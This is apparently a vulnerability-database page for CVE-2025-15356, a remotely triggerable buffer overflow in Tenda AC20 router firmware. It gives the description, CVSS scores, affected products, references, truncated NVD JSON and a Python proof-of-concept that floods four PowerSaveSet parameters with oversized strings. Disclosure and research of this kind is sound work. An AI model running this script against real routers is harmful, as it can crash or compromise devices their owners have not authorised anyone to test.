CVE-2025-15356

Description

A vulnerability has been found in Tenda AC20 up to 16.03.08.12. The impacted element is the function sscanf of the file /goform/PowerSaveSet. The manipulation of the argument powerSavingEn/time/powerSaveDelay/ledCloseType leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac20_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac20:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC20 <= 16.03.08.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15356 PoC - Tenda AC20 Buffer Overflow in /goform/PowerSaveSet
import requests
import sys

def exploit_tenda_ac20(target_ip, target_port=80):
    """
    Exploit for CVE-2025-15356: Buffer overflow in Tenda AC20 /goform/PowerSaveSet
    Target: Tenda AC20 router with firmware <= 16.03.08.12
    """
    url = f"http://{target_ip}:{target_port}/goform/PowerSaveSet"
    
    # Buffer overflow payload - long string to overflow the buffer
    # Adjust the length based on target firmware
    overflow_length = 1000
    overflow_payload = "A" * overflow_length
    
    # Construct malicious parameters
    data = {
        "powerSavingEn": overflow_payload,
        "time": overflow_payload,
        "powerSaveDelay": overflow_payload,
        "ledCloseType": overflow_payload
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {overflow_length} bytes per parameter")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[+] Request sent. Status code: {response.status_code}")
        print(f"[*] Response length: {len(response.text)} bytes")
        
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15356.py <target_ip> [port]")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_tenda_ac20(target_ip, target_port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15356
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15356
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15356/
[4] VulDB https://vuldb.com/cve/CVE-2025-15356
[5] https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC20_Buffer_Overflow/Tenda%20AC20_Buffer_Overflow.md#poc
[6] https://github.com/xyh4ck/iot_poc/tree/main/Tenda%20AC20_Buffer_Overflow
[7] https://vuldb.com/?ctiid.338742
[8] https://vuldb.com/?id.338742
[9] https://vuldb.com/?submit.726360
[10] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15356", "sourceIdentifier": "[email protected]", "published": "2025-12-30T21:15:43.477", "lastModified": "2025-12-31T22:09:38.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tenda AC20 up to 16.03.08.12. The impacted element is the function sscanf of the file /goform/PowerSaveSet. The manipulation of the argument powerSavingEn/time/powerSaveDelay/ledCloseType leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en Tenda AC20 hasta 16.03.08.12. El elemento afectado es la función sscanf del archivo /goform/PowerSaveSet. La manipulación del argumento powerSavingEn/time/powerSaveDelay/ledCloseType conduce a desbordamiento de búfer. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado al público y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac20_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.03.08.12", "matchCriteriaId": "50E492C0-7E5C-4678-B2D7-651FA13A58BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac20:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F7CEE4E-8C63-4ED5-9AE1-A1CFEA555E7C"}]}]}], "references": [{"url": "https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC20_Buffer_Overflow/Tenda%20AC20_Buffer_Overflow.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/xyh4ck/iot_poc/tree/main/Tenda%20AC20_Buffer_Overflow", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338742", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338742", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.726360", "source": "[email protected]", "tags": ["Third Party Advisory ... (truncated)